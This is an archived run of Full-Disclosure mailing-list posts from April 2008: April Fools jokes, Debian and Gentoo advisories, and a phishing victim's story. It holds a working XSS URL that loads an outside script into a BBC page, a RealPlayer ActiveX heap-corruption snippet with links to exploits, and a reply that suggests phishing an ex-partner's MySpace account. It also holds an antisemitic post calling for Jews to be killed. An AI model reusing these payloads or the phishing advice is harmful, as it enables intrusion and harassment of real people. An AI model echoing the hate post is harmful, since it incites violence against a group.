CVE, but if it's a fundamental design problem | in a single RFC, and *any* conformant implementation will have the issue, | then it gets a single CVE. 
02.02.2008: Updated Steve with details on the vulnerability
07.02.2008: Contacted Steve again for an update
26.02.2008: Contacted Steve again with the explicit wish for CVE IDs
            for the issues in Outlook, Windows Live Mail and
            Office 2007
28.02.2008: Contacted Steve again asking for the assignment of the
            CVE IDs
28.02.2008: Contacted cve at mitre.org as well in case Steve is no
            longer the correct contact

From what I read on the CVE website, it looks like Microsoft assigns
the CVE IDs for their own issues themselves, but they don't talk to
me very much either.

I like the CVE idea and would like to use CVE IDs whenever possible,
but someone would have to answer my mails for that.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Credits:

- Alexander Klink, Cynops GmbH (discovery)

-- 
Dipl.-Math. Alexander Klink | IT-Security Engineer |    a.klink at cynops.de
 mobile: +49 (0)178 2121703 |          Cynops GmbH | http://www.cynops.de
----------------------------+----------------------+---------------------
      HRB 7833, Amtsgericht | USt-Id: DE 213094986 |     Geschäftsführer:
     Bad Homburg v. d. Höhe |                      |      Martin Bartosch
-------------- next part --------------
A non-text attachment was scrubbed...
Name: smime.p7s
Type: application/x-pkcs7-signature
Size: 5045 bytes
Desc: S/MIME Cryptographic Signature
Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/c8ce5963/attachment-0001.bin

From tecklord at securitylab.ru Tue Apr 1 10:38:40 2008
From: tecklord at securitylab.ru (Valery Marchuk)
Date: Tue, 1 Apr 2008 12:38:40 +0300
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
References:
Message-ID: <627CE286524A4000B3318FDCF5074725@gw1>

BBC reports: Secretary-General Ban Ki-moon made an official statement
supporting Windows Vista and Windows Server 2008.

"I believe a bug in OS Linux has allowed hackers to access Pentagon network
and steal classified national security information and place blame on China",
said Ban Ki-moon

More at

http://www.securitylab.ru/news/extra/349440.php (English)

or

http://www.securitylab.ru/news/349441.php (Russian)

with links to BBC and un.org.

BR,

Valery Marchuk

www.SecurityLab.ru

From s.u.n at free.Fr Tue Apr 1 11:18:14 2008
From: s.u.n at free.Fr (S/U/N)
Date: Tue, 01 Apr 2008 12:18:14 +0200
Subject: [Full-disclosure] UN against Open Source. Linux is a threat?
In-Reply-To: <627CE286524A4000B3318FDCF5074725@gw1>
References: <627CE286524A4000B3318FDCF5074725@gw1>
Message-ID: <47F20BE6.7070604@free.Fr>

Nice 1st of xss april!

http://www.bbc.co.uk/apps/ifl/fivelive/sportsquiz/quizengine?quiz=today&pagerType=pages%3Cscript%20src=http://www.securitylab.ru/test/1april.js%3E%3C/script%3E%3C!--&pagerData=1

Valery Marchuk wrote:
> BBC reports: Secretary-General Ban Ki-moon made an official statement
> supporting Windows Vista and Windows Server 2008.
>
> "I believe a bug in OS Linux has allowed hackers to access Pentagon network
> and steal classified national security information and place blame on China",
> said Ban Ki-moon
>
> More at
>
> http://www.securitylab.ru/news/extra/349440.php (English)
>
> or
>
> http://www.securitylab.ru/news/349441.php (Russian)
>
> with links to BBC and un.org.
>
> BR,
>
> Valery Marchuk
>
> www.SecurityLab.ru
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

From evilrabbi at gmail.com Tue Apr 1 14:58:13 2008
From: evilrabbi at gmail.com (evilrabbi)
Date: Tue, 1 Apr 2008 08:58:13 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID:

Why would you release something like this without telling the vendor?
What you did is irresponsible.

On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters wrote:

> Hahaha, nice find.

-- 
-- h0 h0 h0 --
www.nopsled.net
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/7c4543a1/attachment.html

From razishaban at gmail.com Tue Apr 1 15:22:55 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Tue, 1 Apr 2008 18:22:55 +0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To:
References: <1207026022.3142.287.camel@localhost>
	<997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <2d792fb20804010722g686e6b7aq8b9ea4b25cac91c4@mail.gmail.com>

April Fools!

--
Razi

On 4/1/08, evilrabbi wrote:
> Why would you release something like this without telling the vendor?
> What you did is irresponsible.
>
> On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters wrote:
>
> > Hahaha, nice find.

From elazar at hushmail.com Tue Apr 1 15:28:47 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 10:28:47 -0400
Subject: [Full-disclosure] Metasploit Framework 4.0 / PwnCraft RTS Game
Message-ID: <20080401142847.BCC6CD01A3@mailserver10.hushmail.com>

Let the foolz begin :) Happy April 1st!

On Tue, 01 Apr 2008 01:49:23 -0400 METASPLOIT CORPORATION wrote:
>FOR IMMEDIATE RELEASE - APR 1, 200(2<<2)
>
>    METASPLOIT CORPORATION ANNOUNCES VERSION 4.0
>OF THE METASPLOIT FRAMEWORK WITH EXCITING FEATURES
>    AND A CLOSED SOURCE LICENSE AGREEMENT.
>
>After over a year and a half in stealth-mode, Metasploit Corporation
>has announced the 4.0 release of their flag-ship product, The
>Metasploit Framework. The new release comes jam-packed with exciting
>features that are sure to please even the German legal system. The
>following brief list includes some of the more fantastic changes.
>
>PWNCRAFT!
>
>Tired of fighting the good fight with the tried and true user
>interfaces you've come to expect from exploitation frameworks? Seeing
>a command shell for the 5000th time got you down? Well, you're in
>luck. Metasploit has decided to return to its rootz in '08 and focus
>on the exploitation-as-a-game model. PwnCraft brings the worlds of
>ownage and pwnage together for the first time in a revolutionary Real
>Time Strategy (RTS) world. Don't be fooled by the game-like
>interface, though! The actions you take in PwnCraft have a real
>effect on the world around you!
>Here's just a taste of some of the absolutely insane features you can
>look forward to:
>
> - Glide through enemy networks with a squadron of elegant winged
>   pwnies
> - Launch devastating attacks against enemy ports in an all-out
>   IPS-evading TCP/IP assault
> - Use the fuzzy Burrowing Badger unit to discover 0day flaws in
>   enemy defenses
> - Conqueer cities and installing agents who can sabotage and smuggle
>   other units to new Vistas
> - An entirely in-game interface to the vulnerability sharing market
>   to improve your arsenal on the fly!
> - AND MORE!
>
>Beta testing of PwnCraft is currently underway and we are hoping to
>begin releasing it in stores at a retail price of $49.99 in Q3 2009.
>More details about the game can be found on the Metasploit website:
>
>http://metasploit.com/
>
>
>CLOSED SOURCE LICENSE
>
>After years of struggling to define Metasploit's licensing position a
>final decision has been made to "screw it" and move the framework to
>a closed source license agreement. The decision was made to sell out
>for a number of reasons, not the least of which has to do with the
>benjamins. Metasploit 2.x and 3.x will no longer be available for
>public download.
>
>SPLOIT AT ME
>
>Get the latest exploits from Metasploit's patent-pending Sploit At Me
>service that delivers exploits on demand. You can rest assured that
>Metasploit's Sploit At Me service will attempt to compromise machines
>of your choosing with *99% reliability.
>
>About Metasploit Corporation
>
>Metasploit Corporation is an industry leader with thousands of
>non-paying customers world-wide. Metasploit delivers high-quality,
>top-notch, success-driven exploits to the security world as
>one-stop-shop exploitation framework.
>
>
> * The other 1% of the time, your own machine will be compromised.

From elazar at hushmail.com Tue Apr 1 16:46:34 2008
From: elazar at hushmail.com (Elazar Broad)
Date: Tue, 01 Apr 2008 11:46:34 -0400
Subject: [Full-disclosure] Real Networks RealPlayer ActiveX Control Heap
	Corruption
Message-ID: <20080401154635.1A3551A0039@mailserver8.hushmail.com>

Now that this is patched...

http://milw0rm.com/exploits/5332
http://metasploit.com/svn/framework3/trunk/modules/exploits/windows/browser/realplayer_console.rb

Elazar

On Mon, 10 Mar 2008 01:50:57 -0400 Elazar Broad wrote:
>Who:
>Real Networks
>http://www.real.com
>
>What:
>Real Networks Real Player is a popular media player.
>
>How:
>Real Player utilizes an ActiveX control to play content within the
>users browser.
>
>rmoc3260.dll version 6.0.10.45
>{2F542A2E-EDC9-4BF7-8CB1-87C9919F7F93}
>{CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}
>
>It is possible to modify heap blocks after they are freed and
>overwrite certain registers, possibly allowing code execution.
>Like so:
>
>------------
>var buf = '';
>while (buf.length < 1005) buf = buf + 'A';
>
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m
>
>//repeat
>m = obj.Console;
>obj.Console = buf;
>obj.Console = m --> Should crash here
>-------------
>
>Workaround:
>Set the killbit for this control.
>See http://support.microsoft.com/kb/240797
>
>Fix:
>No official fix known
>
>Exploit:
>Working on it
>
>Elazar

From DAVID.G.WESTON at saic.com Tue Apr 1 16:49:03 2008
From: DAVID.G.WESTON at saic.com (David Weston)
Date: Tue, 01 Apr 2008 08:49:03 -0700
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To: <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID:

I saw Nate do a 0day sploit on this at the Hard Rock Amsterdam!

On 3/31/08 10:18 PM, "Nate McFeters" wrote:

> Hahaha, nice find.

>> Thanks,
>> David Weston
>> Security Engineer
>> Science Application International Corporation
>> Web: http://www.saic.com/infosec
>> Email:DAVID.G.WESTON at saic.com
>> Office:858-826-5435
>> Cell: 310-866-9713
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/4f4cce11/attachment.html

From devin at debian.org Tue Apr 1 08:54:38 2008
From: devin at debian.org (Devin Carraway)
Date: Tue, 1 Apr 2008 09:54:38 +0200 (CEST)
Subject: [Full-disclosure] [SECURITY] [DSA 1533-2] New exiftags packages fix
	several vulnerabilities
Message-ID: <20080401075438.B19CE326A9E@morgana.loeki.tv>

------------------------------------------------------------------------
Debian Security Advisory DSA-1533-2                  security at debian.org
http://www.debian.org/security/                           Devin Carraway
April 01, 2008                        http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : exiftags
Vulnerability  : insufficient input sanitizing
Problem type   : local (remote)
Debian-specific: no
CVE Id(s)      : CVE-2007-6354 CVE-2007-6355 CVE-2007-6356
Debian Bug     : 457062

Christian Schmid and Meder Kydyraliev (Google Security) discovered a
number of vulnerabilities in exiftags, a utility for extracting EXIF
metadata from JPEG images. This update merely adds the packages for
Debian 3.1 sarge (oldstable) which were missing in the previous DSA.
The Common Vulnerabilities and Exposures project identified the
following three problems:

CVE-2007-6354

    Inadequate EXIF property validation could lead to invalid memory
    accesses if executed on a maliciously crafted image, potentially
    including heap corruption and the execution of arbitrary code.

CVE-2007-6355

    Flawed data validation could lead to integer overflows, causing
    other invalid memory accesses, also with the potential for memory
    corruption or arbitrary code execution.

CVE-2007-6356

    Cyclical EXIF image file directory (IFD) references could cause
    a denial of service (infinite loop).

For the stable distribution (etch), these problems have been fixed in
version 0.98-1.1+etch1.

For the oldstable distribution (sarge), these problems have been fixed
in version 0.98-1.1+0sarge1.

For the unstable distribution (sid), these problems have been fixed in
version 1.01-0.1.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.
These files will probably be moved into the stable distribution on its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

From lassiterxavier at yahoo.com Tue Apr 1 00:58:12 2008
From: lassiterxavier at yahoo.com (Xavier lassiter)
Date: Mon, 31 Mar 2008 16:58:12 -0700 (PDT)
Subject: [Full-disclosure] Xbox live
accounts are being stolen (update)
Message-ID: <672631.87889.qm@web63011.mail.re1.yahoo.com>

Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live accounts just like to tell you my account was also Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now its march 31st well me and two of my friends accounts got stolen by my friend giving me this web site for free Microsoft Points like (Excuse me for my langue) Like a Fucking Dumb ass I went to the web site I looks just like a Xbox web site here is a link www.freempz.110mb.com when you look at the website it looks so real so I put in my e-mail address and password just like Xbox.com and it signed me in nothing happened so I got of my computer and went on my Xbox and a few minutes later I get a friend request from another person it was my friend and he told me not to go to that web site because they took his information when he told me that I went to change my information it was to late the email was changed and the password so what I did was I was going to stay on but it kicked me of I did not say I singed off but I tried to sign back in it said that my account was recovered so I called Xbox im going to try to remember everything ok I called them and I told them my account was stolen they did not know what the hell I was talking about after I spent Five minutes explaining to them that my account was stolen so they man I was talking to asked me for the gamertag Xman1231 they they asked me what was the address oh and this is on the first day and he asked me what was my secret password what was my pets name first I said I don't have a pet and I told him that I put my favorite food and I told him that everything was changed my address name last name everything they that's when the guy got what the hell I was talking about it would been good if I wrote there names down but I did not let me get back the subject at hand ok then they put me on hold and then they put me on hold again and that's when they put me in contact with the supervisor Matt I talked to him and everything and he said that he can suspend the account oh while this was happening they puck ass hacker was on my account but the I told they guy everything I told the man I was talking to that was they supervisor told me they will be in contact with me at the end of this week or next week in my mind I know there not going to call but they supervisor told me that I can make another account while I wait for there call he gave me a reference number and I got off the phone and I made a new account and I was thinking that can they just remove the email address and pass word that's there and add a new one but it was to late to call I apologize for my writing and thank you for reading this e-mail. if any question to asked you can contact me at my e-mail address lassiterxavier at yahoo.com

From druid at caughq.org Tue Apr 1 18:27:05 2008
From: druid at caughq.org (I)ruid)
Date: Tue, 01 Apr 2008 12:27:05 -0500
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door Race Condition
In-Reply-To:
References: <1207026022.3142.287.camel@localhost> <997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <1207070825.3142.293.camel@localhost>

On Tue, 2008-04-01 at 08:58 -0500, evilrabbi wrote:
> Why would you realease something like this without telling the vendor?
> What you did is irresponsible.
That is /exactly/ correct: http://www.caughq.org/advisories/disclosure.html

--
I)ruid, C?ISSP
druid at caughq.org
http://druid.caughq.org

From Valdis.Kletnieks at vt.edu Tue Apr 1 18:34:03 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Tue, 01 Apr 2008 13:34:03 -0400
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: Your message of "Mon, 31 Mar 2008 16:58:12 PDT." <672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <6380.1207071243@turing-police.cc.vt.edu>

On Mon, 31 Mar 2008 16:58:12 PDT, Xavier lassiter said:
> info on Hacked Xbox live accounts just like to tell you my account was also
> Hacked since Wednesday march 26th 2008 I been talking to Xbox for two weeks now

So you've been talking to them for two weeks about something that happened less than a week ago.

Moral: If you don't even know what day of the week it is, you probably shouldn't be using the Internet.

From blah at blakogre.com Tue Apr 1 19:13:58 2008
From: blah at blakogre.com (blah)
Date: Tue, 1 Apr 2008 11:13:58 -0700
Subject: [Full-disclosure] Xbox live accounts are being stolen (update)
In-Reply-To: <672631.87889.qm@web63011.mail.re1.yahoo.com>
References: <672631.87889.qm@web63011.mail.re1.yahoo.com>
Message-ID: <28f529ba0804011113l3720982cq90feba4b94eb1e2d@mail.gmail.com>

I'd like to introduce you to a new friend you haven't met before: http://images.jupiterimages.com/common/detail/80/16/22421680.jpg

"march 26th 2008 I been talking to Xbox for two weeks now its march 31st "

Hacked 3/26. Now 3/31. 2 weeks?

Here: http://www.amazon.com/Subtraction-Flash-Cards-Pack-54/dp/0307249522/ref=pd_bbs_sr_1?ie=UTF8&s=books&qid=1207073496&sr=8-1

All of that aside, hope you get things restored.

2008/3/31 Xavier lassiter : > > > Hi My Name Is Xavier And You said to send you any info on Hacked Xbox live > accounts just like to tell you my account was also Hacked since Wednesday > march 26th 2008 I been talking to Xbox for two weeks now its march 31st well > me and two of my friends accounts got stolen by my friend giving me this web > site for free Microsoft Points like (Excuse me for my langue) Like a Fucking > Dumb ass I went to the web site I looks just like a Xbox web site here is a > link www.freempz.110mb.com when you look at the website it looks so real so > I put in my e-mail address and password just like Xbox.com and it signed me > in nothing happened so I got of my computer and went on my Xbox and a few > minutes later I get a friend request from another person it was my friend > and he told me not to go to that web site because they took his information > when he told me that I went to change my information it was to late the > email was changed and the password so what I did
was I was going to stay on > but it kicked me of I did not say I singed off but I tried to sign back in > it said that my account was recovered so I called Xbox im going to try to > remember everything ok I called them and I told them my account was stolen > they did not know what the hell I was talking about after I spent Five > minutes explaining to them that my account was stolen so they man I was > talking to asked me for the gamertag Xman1231 they they asked me what was > the address oh and this is on the first day and he asked me what was my > secret password what was my pets name first I said I don't have a pet and I > told him that I put my favorite food and I told him that everything was > changed my address name last name everything they that's when the guy got > what the hell I was talking about it would been good if I wrote there names > down but I did not let me get back the subject at hand ok then they put me > on hold and then they put me on hold again and that's when they put me in > contact with the supervisor Matt I talked to him and everything and he said > that he can suspend the account oh while this was happening they puck ass > hacker was on my account but the I told they guy everything I told the man I > was talking to that was they supervisor told me they will be in contact with > me at the end of this week or next week in my mind I know there not going to > call but they supervisor told me that I can make another account while I > wait for there call he gave me a reference number and I got off the phone > and I made a new account and I was thinking that can they just remove the > email address and pass word that's there and add a new one but it was to > late to call I apologize for my writing and thank you for reading this > e-mail. if any question to asked you can contact me at my e-mail address > lassiterxavier at yahoo.com > > ________________________________ > OMG, Sweet deal for Yahoo! 
users/friends: Get A Month of Blockbuster Total > Access, No Cost. W00t > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >

From rbu at gentoo.org Tue Apr 1 20:17:06 2008
From: rbu at gentoo.org (Robert Buchholz)
Date: Tue, 1 Apr 2008 21:17:06 +0200
Subject: [Full-disclosure] [ GLSA 200804-01 ] CUPS: Multiple vulnerabilities
Message-ID: <200804012117.06507.rbu@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200804-01
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: High
     Title: CUPS: Multiple vulnerabilities
      Date: April 01, 2008
      Bugs: #211449, #212364, #214068
        ID: 200804-01

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in CUPS, allowing for the remote execution of arbitrary code and a Denial of Service.

Background
==========

CUPS provides a portable printing layer for UNIX-based operating systems.

Affected packages
=================

    -------------------------------------------------------------------
     Package         /  Vulnerable  /                       Unaffected
    -------------------------------------------------------------------
  1  net-print/cups      < 1.2.12-r7                      >= 1.2.12-r7

Description
===========

Multiple vulnerabilities have been reported in CUPS:

* regenrecht (VeriSign iDefense) discovered that the cgiCompileSearch() function used in several CGI scripts in CUPS' administration interface does not correctly calculate boundaries when processing a user-provided regular expression, leading to a heap-based buffer overflow (CVE-2008-0047).

* Helge Blischke reported a double free() vulnerability in the process_browse_data() function when adding or removing remote shared printers (CVE-2008-0882).

* Tomas Hoger (Red Hat) reported that the gif_read_lzw() function uses the code_size value from GIF images without properly checking it, leading to a buffer overflow (CVE-2008-1373).

* An unspecified input validation error was discovered in the HP-GL/2 filter (CVE-2008-0053).

Impact
======

A local attacker could send specially crafted network packets or print jobs and possibly execute arbitrary code with the privileges of the user running CUPS (usually lp), or cause a Denial of Service. The vulnerabilities are exploitable via the network when CUPS is sharing printers remotely.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All CUPS users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-print/cups-1.2.12-r7"

References
==========

  [ 1 ] CVE-2008-0047
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
  [ 2 ] CVE-2008-0053
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
  [ 3 ] CVE-2008-0882
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0882
  [ 4 ] CVE-2008-1373
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200804-01.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From codyroby at hotmail.com Tue Apr 1 20:31:38 2008
From: codyroby at hotmail.com (Cody Roby)
Date: Tue, 1 Apr 2008 15:31:38 -0400
Subject: [Full-disclosure] (no subject)
Message-ID:

Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.

From mastahflank at gmail.com Tue Apr 1 20:50:36 2008
From: mastahflank at gmail.com (josh)
Date: Tue, 1 Apr 2008 19:50:36 +0000
Subject: [Full-disclosure] (no subject)
In-Reply-To:
References:
Message-ID: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>

Can you sue for slander? And probably a simple phishing techique would work against her.

-----Original Message-----
From: Cody Roby
Date: Tue, 1 Apr 2008 15:31:38
To:
Subject: [Full-disclosure] (no subject)

Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.

From groffg at gmgdesign.com Tue Apr 1 21:05:38 2008
From: groffg at gmgdesign.com (Garrett M. Groff)
Date: Tue, 1 Apr 2008 16:05:38 -0400
Subject: [Full-disclosure] (no subject)
References: <715747295-1207079441-cardhu_decombobulator_blackberry.rim.net-472956415-@bxe032.bisx.prod.on.blackberry>
Message-ID: <00b601c89433$c334cec0$336b880a@softpro.corp>

Another approach is that you could stop reading her blog and seek an alternate past-time(s). That would avoid the commission of computer crime and its possible ramifications.

- G

----- Original Message -----
From: "josh"
To: "Cody Roby" ; ;
Sent: Tuesday, April 01, 2008 3:50 PM
Subject: Re: [Full-disclosure] (no subject)

Can you sue for slander? And probably a simple phishing techique would work against her.

-----Original Message-----
From: Cody Roby
Date: Tue, 1 Apr 2008 15:31:38
To:
Subject: [Full-disclosure] (no subject)

Alright i have a crazy ex who keeps posting malicous things about me on her myspace and i would like to know how to use html errors to hack her myspace, i saw a previous post, but the code has been removed. please help.

From xploitable at gmail.com Tue Apr 1 21:59:43 2008
From: xploitable at gmail.com (n3td3v)
Date: Tue, 1 Apr 2008 21:59:43 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <20605.1206932416@turing-police.cc.vt.edu>
References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com> <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu>
Message-ID: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com>

On Mon, Mar 31, 2008 at 4:00 AM, wrote:
> On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
>
> > Why are they announcing podcasts when both Joel Esler and Johannes
> > Ullrich have a privacy breach still to publically acknowledge and
> > apologize for?
>
> Umm.. maybe because, despite what you may think, your little pissing contest
> with Joel and Johannes doesn't qualify as a "oh my ghod, let's drop *everything*
> and shut down the entire workflow and not do a single damned thing until this
> issue is resolved".

They aren't busy or getting on with business, they have obviously snubbed the n3td3v agenda.

Joel Esler is back on duty, http://isc.sans.org/diary.html?storyid=4225 he obviously hasn't been sacked and he is talking about April Fools Day.
I'm mighty angry, n3td3v From gluttony at gmail.com Wed Apr 2 00:21:55 2008 From: gluttony at gmail.com (Andrew A) Date: Tue, 1 Apr 2008 16:21:55 -0700 Subject: [Full-disclosure] Greedy Jews fact of the day Message-ID: <1865973b0804011621i6eb44980v1d6c307764cefdc0@mail.gmail.com> "And it shall be, when the LORD thy God shall bring thee into the land which He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give thee--great and goodly cities, which thou didst not build, and houses full of all good things, which thou didst not fill, and cisterns hewn out, which thou didst not hew, vineyards and olive-trees, which thou didst not plant, and thou shalt eat and be satisfied." These verses from Deuteronomy chapter 6 are written on a piece of parchment and placed in a box which is hung outside the house of every Jew that keeps the covenant. And so they have accomplished, in the United States of America. The subprime crises and resulting bailouts (at our expense by our national reserve bank, which is headed by an Orthodox Jew serving a board of Orthodox Jews) are going to create thousands of empty homes and plots of arable land owned by investment banking institutions that are owned exclusively by Orthodox Jews. Why should we leave a single follower of such a filthy, greedy religion alive? Do any of you have an idea? I pray to you, the Lord my God, to help me destroy the Jewish meme. Every single follower of this arrogant and horrible idea should have their gold exchanged for flying pieces of lead and steel. Let the Jews take what they have reaped and sown-- death, destruction and hatred. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080401/fe4e5925/attachment.html From groffg at gmgdesign.com Tue Apr 1 15:44:27 2008 From: groffg at gmgdesign.com (Garrett M. 
Groff)
Date: Tue, 1 Apr 2008 10:44:27 -0400
Subject: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition
References: <1207026022.3142.287.camel@localhost><997ef2c20803312218n65a6321cq215f88e872de41ba@mail.gmail.com>
Message-ID: <002901c89406$e3c5e110$336b880a@softpro.corp>

Although, in all seriousness, I can imagine "physical world" things being compromised, possibly via software attacks alone (or, equally likely, a single disgruntled employee). Allow me to explain using a particular example: safes.

Companies that make safes (be they old-fashioned mechanical or electronic) often have records of their combinations corresponding to a unique serial number for each safe. Yes, they have an electronic database of all the combinations for all their safes. In the case of electronic safes, this combination is often un-changeable; the user of the safe can use that factory default code initially to create a "user combination" that can open the safe, but can later be changed (if you wish to disallow that user access later on). Anyway, the factory default combination can't be changed and is in a database somewhere. This presents a convenience on the part of the business that produces the safes (avoids angry customers who are locked out of their safes) but reduces security for all users of that company's products.

I understand the business case for keeping records of all combinations for all safes, but the downside is security in the event that that list/database is ever leaked.

- G

----- Original Message -----
From: evilrabbi
To: Nate McFeters
Cc: full-disclosure at lists.grok.org.uk ; bugtraq at securityfocus.com
Sent: Tuesday, April 01, 2008 9:58 AM
Subject: Re: [Full-disclosure] CAU-2008-0001 - Slowly Closing Door RaceCondition

Why would you realease something like this without telling the vendor? What you did is irresponsible.

On Tue, Apr 1, 2008 at 12:18 AM, Nate McFeters wrote:

Hahaha, nice find.
On 4/1/08, I)ruid wrote: ____ ____ __ __ / \ / \ | | | | ----====####/ /\__\##/ /\ \##| |##| |####====---- | | | |__| | | | | | | | ___ | __ | | | | | ------======######\ \/ /#| |##| |#| |##| |######======------ \____/ |__| |__| \______/ Computer Academic Underground http://www.caughq.org Security Advisory ===============/======================================================== Advisory ID: CAU-2008-0001 Release Date: 04/01/2008 Title: Slowly Closing Door Race Condition Application/OS: Physical Structures Topic: Physical structures employing exit doors with locks are vulnerable to a race condition. Vendor Status: Not Notified Attributes: Physical, Race Condition Advisory URL: http://www.caughq.org/advisories/CAU-2008-0001.txt Author/Email: CAU ===============/======================================================== Overview ======== Physical structures which employ automatically locking doors to secure exit points expose a race condition which may allow unauthorized entry. Impact ====== Malicious outsiders may be able to enter a structure via an exit point. Exit points may additionally provide an exit from a secure area of the structure, allowing an outsider entering through the exit point to gain direct access to the secure area. Affected Systems ================ Physical structures which employ automatically locking doors at exit points of the structure. Technical Explanation ===================== An exit's lock[1] generally converts a two-way door into a one-way door, allowing a person to traverse the door's threshold in one direction but not in the other. These types of locks are used to secure exit points of structures so that people may exit via the door but not re-enter without disabling the lock through force or authentication. When a person exits the structure through an exit point which is secured by such a mechanism, a race condition exists wherein a malicious outsider may be able to reach the door and enter through it before it closes and locks itself. 
Many doors, especially heavier ones, also employ closing mechanisms[2] which are designed to cause the door to close slowly so as not to slam the door shut and damage the door frame, or damage any human appendage which may be in between the door and it's frame. Such closing mechanisms can greatly increase the amount of time that the race condition exists. Solution & Recommendations ========================== 1) Always ensure that personnel exiting an exit door wait outside the door until it has completely closed and locked before walking away. 2) Employ a double door system such as is used in an air-lock where the interior door must be secured prior to the exterior door being allowed to open. Exploitation ============ First identify the exit point that you want to exploit. Stand at a safe distance during a high-traffic time and watch for people to use the exit point. Time how long it takes for the door to close and lock itself when someone traverses the exit point. Next, identify a safe hiding place near the exit point, preferably in a direction that would be behind a person exiting the door, but which is within a distance to the exit point which you could traverse in under the door's closing time at a brisk pace or run. Finally, hide in this location during a lower traffic time and wait for someone to utilize the exit point. After they have exited the door and are walking away, run to the door and enter before it has closed and locked. Extra points are awarded for a spectacular dive and/or roll to catch the door at the very last second. References ========== [1] http://en.wikipedia.org/wiki/Lock_%28device%29 [2] http://en.wikipedia.org/wiki/Door_closer Credits & Gr33ts ================ Theodor Geisel, AHA!, NMRC, Uninformed Journal, dc214 -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org _______________________________________________ Full-Disclosure - We believe in it. 
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
